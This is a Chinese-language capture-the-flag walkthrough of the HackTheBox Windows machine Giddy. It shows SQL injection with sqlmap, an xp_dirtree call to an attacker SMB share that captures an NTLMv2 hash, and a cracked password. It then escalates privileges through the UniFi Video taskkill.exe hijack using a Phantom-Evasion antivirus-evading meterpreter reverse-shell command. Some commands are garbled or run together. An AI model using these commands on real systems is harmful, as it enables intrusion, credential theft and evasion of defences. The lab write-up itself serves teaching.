HackTheBox-windows-Giddy

靶机地址：https://www.hackthebox.eu/home/machines/profile/153

靶机难度：中级（5.0/10）

靶机发布日期：2019年2月12日

靶机描述：

Giddy is a medium difficulty machine, which highlights how low privileged SQL Server logins can be used to compromise the underlying SQL Server service account. This is an issue in many environments, and depending on the configuration, the service account may have elevated privileges across the domain. It also features Windows registry enumeration and custom payload creation.

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.90....

这里的思路：

Giddy是一台中等难度的计算机，它着重介绍了如何使用低特权的SQL Server登录名来破坏基础SQL Server服务帐户。在许多环境中，这是一个问题，根据配置，服务帐户可能在整个域中具有提升的特权。它还具有Windows注册表枚举和自定义有效负载创建的功能。

nmap发现开放了80和443端口，并且windows server IIS 10.0....3389端口也开放着...

https页面还可以使用powershell...那就进入页面就能成功了...

一条可爱的狗...443端口也是一模一样的界面...

这里直接利用gobuster爆破目录好了...

gobuster dir -w directory-list-2.3-medium.txt -u http://10.10.10.104/

发现了/remote目录，访问...

可以看到重定向到了Windows PowerShell Web Access...

提醒我们该网站使用安全套接字层（SSL）协议，并且需要HTTPS地址...

OK，按照他说做...

这里需要用户名和密码进行登陆，目前都没...继续访问mvc...

登陆这是一个产品列表，进去可以看到价格...

关注到该页面地址：

https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26

随意加个字符，发现存在sql错误信息...提示引号字符串错误...这里利用sqlmap注入看...

可以看到，正在以MSSQL作为DBMS 运行着...可以强制MSSQL服务器重新连接以与SMB一起使用，然后使用响应程序来获取NTLMv2哈希...

MSSQL支持堆叠查询，因此可以创建一个指向我们IP地址的变量，然后使用该xp_dirtree函数列出SMB共享中的文件并获取NTLMv2哈希.

python3 smbserver.py dayu pwdsqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26 --sql-shellEXEC master..xp_dirtree '\10.10.14.11dayu'

成功获得用户和哈希值...

利用john解析了密码：

xNnWo6272k7x

成功登陆...果然前面nmap也发现了powershell...

直接利用即可...

成功获得user信息....

unifivideo是一个功能强大且灵活的集成IP视频管理监视系统，在与Ubiquiti的UniFi Video Camera产品系列一起使用，UniFi Video具有直观，可配置和功能丰富的用户界面，具有高级功能，例如运动检测，自动发现，用户级安全性，存储管理，报告和移动设备支持...

可以看到unifivideo可利用得漏洞CVE-2016-6914，使用43390EXP进行提权...

在启动Ubiquiti UniFi Video服务时，它将尝试执行一个名为的文件taskkill.exe程序，只需要将创建好的恶意程序放置到taskkill.exe中，然后重新启动服务即可提权...按照EXP的意思做...

确认是存在UniFi Video的...

本地创建一个taskkill.exe的shellcode...然后上传即可...

没成功....

可以发现程序没了...有防病毒模块开启着，把我在启动Ubiquiti UniFi Video服务后，立马删除了...

这里利用

[Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion)

程序进行绕过...很强大的工具...

python3 phantom-evasion.py --setup记得更新包...

介绍：Phantom-Evasion是一种使用python编写的防病毒逃避工具（均与python和python3兼容），即使使用最常见的x86 msfvenom有效负载，它也能够生成（几乎）完全无法检测到的可执行文件...

这里有帮助命令...GO

这里利用直接生成欺骗性恶意程序....：Windows Shell代码注入，输出带有欺骗性https证书的签名exe，本地执行方法：线程，内存：Virtual_RWX，加密：vigenere....

python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 10.10.14.11 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o taskkill.exe

生成 taskkill.exe...导入即可提权...

开启MSF监听方便点...然后上传taskkill...成功提权获得root信息...

这里还可以利用：

https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

或者Ebowla github封装msf生成的.exe

等等，应该还有很多方法绕开提权....

由于我们已经成功得到root权限查看user.txt和root.txt，因此完成了靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。

如果觉得这篇文章对你有帮助，可以转发到朋友圈，谢谢小伙伴~

随缘收徒中~~随缘收徒中~~随缘收徒中~~

欢迎加入渗透学习交流群，想入群的小伙伴们加我微信，共同进步共同成长！

大余安全

一个全栈渗透小技巧的公众号

本文始发于微信公众号（大余安全）：HackTheBox-windows-Giddy